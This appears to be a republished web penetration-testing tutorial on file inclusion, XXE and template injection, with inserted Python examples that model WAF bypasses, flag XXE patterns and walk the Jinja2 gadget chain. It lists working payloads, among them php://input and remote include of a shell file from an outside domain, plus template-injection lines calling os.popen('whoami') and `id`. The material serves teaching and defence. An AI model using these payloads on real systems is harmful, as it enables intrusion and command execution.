

Penetration testing: detecting file inclusion vulnerabilities in web sites

2025-02-02 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Yesterday we covered detection methods for command execution vulnerabilities. Today the penetration engineers at Sine Security take the time to describe detection methods and defences for file inclusion and template injection vulnerabilities. This article refers only to authorised penetration tests carried out for formal security testing customers, so that more customers understand what a comprehensive website security test actually covers.

3.8. File inclusion

3.8.1. Basics

Common forms of file inclusion vulnerabilities

Consider several commonly used ways of including a file:

- Same-directory inclusion: ?file=.htaccess
- Directory traversal: ?file=../var/lib/locate.db
- Log injection: ?file=../var/log/apache/error.log
- Using /proc/self/environ

Log injection can be tested against several log sources, such as SSH logs or web server logs.

3.8.2. Bypass technique

Applications commonly call a function to check the file name before including it. There are several general ways to bypass such checks.

3.8.2.1. URL encoding bypass

If the WAF matches on literal strings, applying URL encoding more than once can bypass it, provided the application decodes the parameter one more time than the WAF does.
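As an added example (not from the original article or from Sine Security), the following Python models the decode-depth mismatch behind this bypass: a WAF that URL-decodes once and looks for `../` is passed by a double-encoded traversal that the application decodes a second time. The hardened resolver decodes until the value stops changing, rejects the stream wrappers listed under 3.8.2.5 and NUL bytes, and confines the canonical path to the include directory. The base directory `/srv/app/pages` and the parameter values are constructed for illustration.

```python
import os
from urllib.parse import unquote

# Stream wrappers that include() would open instead of a local file (see 3.8.2.5).
BLOCKED_SCHEMES = ("php://", "data://", "http://", "https://", "ftp://")

# Constructed payload: "../../var/log/apache/error.log" URL-encoded twice.
DOUBLE_ENCODED = "%252e%252e%252f%252e%252e%252fvar%252flog%252fapache%252ferror.log"


def naive_waf_blocks(raw_param: str) -> bool:
    """Decodes once, then matches literal traversal sequences. A second layer
    of encoding hides '../' from this check."""
    decoded = unquote(raw_param)
    return "../" in decoded or "..\\" in decoded


def app_decodes(raw_param: str) -> str:
    """Models an application that decodes a second time (framework decode
    followed by an explicit urldecode()), so it sees the plain traversal."""
    return unquote(unquote(raw_param))


def full_decode(value: str, max_rounds: int = 8) -> str:
    """Decode until the string stops changing, so the check sees what the
    application will eventually see however many layers were applied."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")


def resolve_include(base_dir: str, raw_param: str) -> str:
    """Hardened counterpart: full decode, reject wrappers and NUL bytes, then
    canonicalise and confine the result to base_dir."""
    value = full_decode(raw_param)
    if value.lower().startswith(BLOCKED_SCHEMES):
        raise ValueError("stream wrapper not allowed: " + value)
    if "\x00" in value:
        raise ValueError("NUL byte in file name")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes include directory: " + target)
    return target


def include_is_rejected(base_dir: str, raw_param: str) -> bool:
    """True when resolve_include refuses the parameter."""
    try:
        resolve_include(base_dir, raw_param)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("naive WAF blocks the double-encoded payload:", naive_waf_blocks(DOUBLE_ENCODED))
    print("application actually includes:", app_decodes(DOUBLE_ENCODED))
    print("hardened resolver rejects it:", include_is_rejected("/srv/app/pages", DOUBLE_ENCODED))
    print("hardened resolver rejects php://input:", include_is_rejected("/srv/app/pages", "php%253A%252F%252Finput"))
```

The point of `full_decode` is that the check and the application must agree on the final form of the parameter; any filter that decodes fewer times than the code that opens the file can be stepped around with one more layer of encoding.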

3.8.2.2. Special character bypass

In some cases the file read supports shell wildcards, and characters such as ? and # in the URL may affect the result of the include. In some cases characters with different Unicode encodings but similar glyphs have the same effect.

3.8.2.3. %00 truncation

Null-byte (%00) truncation is probably the most commonly used method, provided that magic_quotes_gpc is off and the PHP version is below 5.3.4.

3.8.2.4. Length truncation

On Windows the permitted file name length depends on the full path: counted from the root directory, the longest file path is 259 bytes.

MSDN defines `#define MAX_PATH 260`; the 260th character is the terminating `\0` of the string.

On Linux, getconf reports the file name and file path length limits:

Longest file path: getconf PATH_MAX /root gives 4096
Longest file name: getconf NAME_MAX /root gives 255

So when the length is limited, the suffix the application appends can be pushed past the limit by padding the path with `./` repeated n times.

In PHP code inclusion this bypass requires PHP < 5.2.8.

3.8.2.5. Pseudo-protocol (stream wrapper) bypass

Remote include: requires allow_url_fopen=On and allow_url_include=On; payload ?file=[http|https|ftp]://domain/shell.txt

PHP input: the payload is sent in the POST body and used as the included file; requires allow_url_include=On; payload ?file=php://input

Filter: reads a file through the php://filter pseudo-protocol; payload ?file=php://filter/convert.-encode/resource=index.php

Data: reads data through the data:// pseudo-protocol; payload ?file=data://text/plain;,SSBsb3ZlIFBIUAo= ; requires allow_url_include=On

3.9. XXE

3.9.1. XML basics

XML (eXtensible Markup Language) is a markup language for giving electronic documents structure, designed to transport and store data. An XML document consists of the XML declaration, an optional DTD (Document Type Definition) and the document elements. XML is widely used for configuration files (Spring, Struts2 and so on), document structure files (PDF, RSS and so on) and image formats (the SVG header).

3.9.2. XXE

When external entities may be referenced, crafted XML content can read arbitrary files, execute system commands, probe internal ports and attack internal web sites. A plain XXE attack can only read server-side files when the server echoes the parsed content or an error message, but Blind XXE can also be used when there is no echo.

3.9.3. Attack methods

3.9.3.1. Denial of service

(entity-expansion payload not preserved in the extracted text)

If parsing becomes very slow the test has succeeded and the target may have a denial-of-service vulnerability. A real attack can use more layers of iteration or recursion, or reference large external entities, to achieve the same effect.

3.9.3.2. File reading

(file-reading XXE payload not preserved in the extracted text)

3.9.3.3. SSRF

(SSRF XXE payload not preserved in the extracted text)

3.9.3.4. RCE

(RCE XXE payload not preserved in the extracted text)
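As an added example (not from the original article or from Sine Security), the Python below inspects a document's DTD before handing it to a parser, which is how a tester or a defender spots the patterns in 3.9.3.1 to 3.9.3.4: internal entities whose expansion is out of proportion to the declared bytes (denial of service) and external entities whose SYSTEM identifier points at a file or a URL (file reading, SSRF, and the RCE case, which rests on the same external-entity mechanism with a different identifier). `parse_safely` is the defensive counterpart, refusing any DOCTYPE. The two sample documents are constructed here for illustration, and the `/etc/passwd` path is only a string; nothing is read.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample for 3.9.3.1: three nested entity layers, ten references each,
# so &a3; expands to 10**3 copies of "lol" (3000 bytes) from about 250 bytes of input.
EXPANSION_DOC = """<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY a0 "lol">
 <!ENTITY a1 "&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;&a0;">
 <!ENTITY a2 "&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;&a1;">
 <!ENTITY a3 "&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;&a2;">
]>
<root>&a3;</root>"""

# Constructed sample for 3.9.3.2: an external general entity whose SYSTEM
# identifier is a local file. An http:// identifier in the same place is the SSRF shape.
FILE_READ_DOC = """<?xml version="1.0"?>
<!DOCTYPE data [ <!ENTITY file SYSTEM "file:///etc/passwd"> ]>
<data>&file;</data>"""

BENIGN_DOC = "<root><item>ok</item></root>"

INTERNAL_ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
EXTERNAL_ENTITY_RE = re.compile(
    r'<!ENTITY\s+(%\s*)?(\w+)\s+(?:SYSTEM|PUBLIC\s+"[^"]*")\s+"([^"]*)"\s*>')
ENTITY_REF_RE = re.compile(r"&(\w+);")


def expansion_sizes(doc: str) -> dict:
    """Expanded byte length of every internal entity, resolving nested
    references recursively and refusing reference cycles."""
    defs = dict(INTERNAL_ENTITY_RE.findall(doc))
    memo = {}

    def size(name, stack):
        if name in stack:
            raise ValueError("recursive entity " + name)
        if name not in memo:
            body, total, pos = defs[name], 0, 0
            for m in ENTITY_REF_RE.finditer(body):
                total += m.start() - pos
                ref = m.group(1)
                total += size(ref, stack + (name,)) if ref in defs else len(m.group(0))
                pos = m.end()
            memo[name] = total + len(body) - pos
        return memo[name]

    return {name: size(name, ()) for name in defs}


def assess(doc: str, max_amplification: float = 10.0) -> list:
    """Findings for the DOCTYPE: external entities (file read / SSRF / RCE) and
    internal entities that expand to more than max_amplification times the
    bytes declared for them (denial of service). An empty list means nothing found."""
    findings = []
    if "<!DOCTYPE" not in doc:
        return findings
    for percent, name, uri in EXTERNAL_ENTITY_RE.findall(doc):
        kind = "parameter" if percent else "general"
        findings.append(f"external {kind} entity {name} -> {uri}")
    declared = sum(len(body) for _, body in INTERNAL_ENTITY_RE.findall(doc))
    for name, expanded in expansion_sizes(doc).items():
        if declared and expanded > max_amplification * declared:
            findings.append(f"entity {name} expands to {expanded} bytes "
                            f"({expanded / declared:.0f}x the declared size)")
    return findings


def parse_safely(doc: str) -> ET.Element:
    """Refuse any document carrying a DOCTYPE; every entity trick above needs one."""
    if "<!DOCTYPE" in doc:
        raise ValueError("DOCTYPE not allowed")
    return ET.fromstring(doc)


def safe_parse_rejects(doc: str) -> bool:
    """True when parse_safely refuses the document."""
    try:
        parse_safely(doc)
        return False
    except ValueError:
        return True


def expanded_text_length(doc: str) -> int:
    """Shows that the stock expat-based parser does expand nested internal
    entities: the length of the root element's text after parsing."""
    return len(ET.fromstring(doc).text or "")


if __name__ == "__main__":
    for label, doc in (("benign", BENIGN_DOC), ("expansion", EXPANSION_DOC), ("file read", FILE_READ_DOC)):
        print(label, "->", assess(doc) or "no findings", "| safe parser rejects:", safe_parse_rejects(doc))
    print("unsafe parse of the expansion document yields", expanded_text_length(EXPANSION_DOC), "bytes of text")
```

The pre-check is a heuristic for testing and triage; in production the reliable control is the last function's rule, disable DOCTYPE and external entity resolution in the parser itself, rather than trying to recognise every payload shape.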

3.9.3.5. XInclude

(XInclude payload not preserved in the extracted text)

3.10. Template injection

Test payloads by template engine:

- Ruby: string expression {{"ajin"}} => ajin
- Java: ${7*7}
- Twig: {{7*7}}
- Smarty: {php}echo `id`{/php}
- AngularJS: $eval('1+1')
- Tornado: reference a module, {% import module %} => {% import os %}{{os.popen("whoami").read()}}
- Flask/Jinja2: {{''.__class__.__mro__[-1].__subclasses__()}}
- Django: {{request}} {% debug %} {% load module %} {% include "x.html" %} {% extends "x.html" %}

3.10.4. Goals

Typical goals of template injection: creating objects, reading and writing files, remote file inclusion, information disclosure, privilege escalation.

3.10.5. Related attributes

3.10.5.1. __class__

New-style classes in Python (classes that explicitly inherit from object) have a __class__ attribute that returns the class of the current instance. For example, ''.__class__ returns the class of the string instance, str.

3.10.5.2. __mro__

The __mro__ attribute of a class object returns a tuple containing the class and all of the base classes it inherits from; the order of the elements in the tuple is the order in which the MRO (Method Resolution Order) looks them up.

3.10.5.3. __globals__

__globals__ holds the global namespace of a function. During exploitation, __init__ is used to obtain a function object from a class, and its __globals__ then gives access to modules such as os (or file in Python 2) for further use.

3.10.5.4. __subclasses__()

New-style classes in Python keep references to all of their subclasses, and the __subclasses__() method returns references to all live subclasses of the class (class object references, not instances).

Because every class in Python inherits from object, the desired class can be obtained simply by calling __subclasses__() on the object class.

If you are not confident about the content and bypass techniques covered in this section of the penetration test for your own website, you can engage a professional website security company to deal with the problem, such as Sinesafe, Green Alliance or Qiming Star.
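As an added example (not from the original article or from Sine Security), the plain Python below performs the same attribute walk as the Flask/Jinja2 payload `{{''.__class__.__mro__[-1].__subclasses__()}}` so that each step of 3.10.5 can be inspected. Nothing below references the os module by name once it is loaded; the module namespace is recovered through a subclass's `__init__.__globals__`, exactly as a template payload recovers it. Which gadget class turns up depends on the interpreter; `_wrap_close` from os.py is the one the test relies on.

```python
import os  # loaded only so os.py's classes exist in a bare interpreter; never referenced below


def object_class():
    """3.10.5.1 / 3.10.5.2: any instance's __class__, then the last entry of
    its __mro__, which is always object."""
    return ''.__class__.__mro__[-1]


def _os_gadgets():
    """3.10.5.4: walk every live subclass of object and yield those whose own
    __init__ is a Python function whose __globals__ (3.10.5.3) is the os module
    namespace, recognised by its __name__ and the presence of popen."""
    for cls in object_class().__subclasses__():
        init = cls.__dict__.get("__init__")          # own __init__, not the inherited slot wrapper
        globs = getattr(init, "__globals__", None)  # only Python functions carry __globals__
        if isinstance(globs, dict) and globs.get("__name__") == "os" and "popen" in globs:
            yield cls, globs


def gadget_classes() -> list:
    """Names of the classes that expose the os namespace (e.g. _wrap_close)."""
    return [cls.__name__ for cls, _ in _os_gadgets()]


def recover_os_namespace() -> dict:
    """The globals dict of the first gadget's __init__, i.e. vars(os):
    popen, system, listdir and friends are all keys of it."""
    for _, globs in _os_gadgets():
        return globs
    raise LookupError("no subclass of object exposes the os namespace")


def recover_builtins() -> dict:
    """Every Python function's __globals__ also carries __builtins__, so
    __import__, open and eval are reachable without naming any module."""
    b = recover_os_namespace()["__builtins__"]
    return b if isinstance(b, dict) else vars(b)


def current_directory_via_gadget() -> str:
    """Calls os.getcwd() obtained purely through the gadget chain; a payload
    would call popen() or system() at this point instead."""
    return recover_os_namespace()["getcwd"]()


if __name__ == "__main__":
    print("root of the MRO:", object_class())
    print("gadget classes:", gadget_classes())
    print("cwd via gadget:", current_directory_via_gadget())
    print("__import__ via gadget:", recover_builtins()["__import__"])
```

Because the chain starts from a string literal and uses only attribute access and calls, it works wherever the template language evaluates arbitrary Python attribute expressions; the defence is to keep user input out of template source entirely, or to render untrusted templates in Jinja2's `SandboxedEnvironment`, which refuses access to attributes such as `__mro__` and `__subclasses__`.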


© 2024 shulou.com SLNews company. All rights reserved.
